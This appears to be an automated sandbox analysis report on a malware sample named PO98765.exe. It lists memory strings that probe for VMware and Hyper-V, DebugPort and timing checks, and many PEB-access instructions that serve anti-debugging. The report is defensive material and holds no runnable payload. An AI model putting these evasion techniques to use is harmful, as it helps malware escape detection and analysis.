          Source: PO98765.exe, 00000000.00000002.682453988.0000000006220000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareNC9EE2_AWin32_VideoController3K4TF8KSVideoController120060621000000.000000-000410.6620display.infMSBDAUK5GLFXWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsD5XYEX9V
          Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.700351269.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000002.00000000.700414904.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO98765.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO98765.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01592073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01553884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01553884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01503B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01503B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01564257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01514A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01514A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01513D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01553540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01583D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0155A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01588DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557794 mov eax, dword ptr fs:[00000030h]
